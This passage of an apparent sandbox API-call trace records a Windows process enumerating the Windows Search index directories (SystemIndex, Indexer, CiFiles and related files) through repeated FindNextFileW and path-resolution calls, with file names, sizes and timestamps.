dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.704] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.704] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29932700, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.705] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.Crwl", cAlternateFileName="SYSTEM~1.CRW")) returned 1 [0138.705] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.gthr", cAlternateFileName="SYSTEM~1.GTH")) returned 1 [0138.705] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29932700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29932700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b773330, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex.1.gthr", cAlternateFileName="SYSTEM~1.GTH")) returned 0 [0138.706] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.706] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.706] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.706] CoTaskMemFree (pv=0x4e1c10) [0138.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.706] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects", lpFilePart=0x0) returned 0x42 [0138.707] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27eb7240, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.707] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 1 [0138.708] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 0 [0138.708] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.708] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27eb7240, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemIndex", cAlternateFileName="SYSTEM~1")) returned 1 [0138.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.709] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.709] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.709] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.710] CoTaskMemFree (pv=0x4e1c10) [0138.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.710] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex", lpFilePart=0x0) returned 0x4e [0138.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.713] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexer", cAlternateFileName="")) returned 1 [0138.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PropMap", cAlternateFileName="")) returned 1 [0138.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecStore", cAlternateFileName="")) returned 1 [0138.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecStore", cAlternateFileName="")) returned 0 [0138.715] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.715] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.715] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexer", cAlternateFileName="")) returned 1 [0138.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27eb7240, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27edd3a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27edd3a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PropMap", cAlternateFileName="")) returned 1 [0138.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecStore", cAlternateFileName="")) returned 1 [0138.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.717] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.717] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.717] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.717] CoTaskMemFree (pv=0x4e1c10) [0138.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.726] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer", lpFilePart=0x0) returned 0x56 [0138.727] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.727] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiFiles", cAlternateFileName="")) returned 1 [0138.727] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiFiles", cAlternateFileName="")) returned 0 [0138.728] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0138.728] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.728] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiFiles", cAlternateFileName="")) returned 1 [0138.729] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aedbc | out: lpFindFileData=0x2aedbc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.729] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.729] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.729] CoTaskMemFree (pv=0x4e1c10) [0138.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.730] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\Indexer\\CiFiles", lpFilePart=0x0) returned 0x5e [0138.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299f0de0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299f0de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.000", cAlternateFileName="")) returned 1 [0138.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a16f40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a16f40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.001", cAlternateFileName="")) returned 1 [0138.732] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a16f40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a16f40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a16f40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0001.002", cAlternateFileName="")) returned 1 [0138.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.000", cAlternateFileName="")) returned 1 [0138.733] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.001", cAlternateFileName="")) returned 1 [0138.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29a3d0a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29a3d0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29a3d0a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAB0002.002", cAlternateFileName="")) returned 1 [0138.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299f0de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.000", cAlternateFileName="")) returned 1 [0138.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299cac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.001", cAlternateFileName="")) returned 1 [0138.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x299cac80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x299cac80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x299cac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CiAD0001.002", cAlternateFileName="")) returned 1 [0138.734] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.000", cAlternateFileName="")) returned 1 [0138.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2997e9c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.001", cAlternateFileName="")) returned 1 [0138.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2997e9c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2997e9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2997e9c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDEX.002", cAlternateFileName="")) returned 1 [0138.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29958860, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29958860, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29958860, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SETTINGS.DIA", cAlternateFileName="")) returned 1 [0138.735] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aed74 | out: lpFindFileData=0x2aed74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 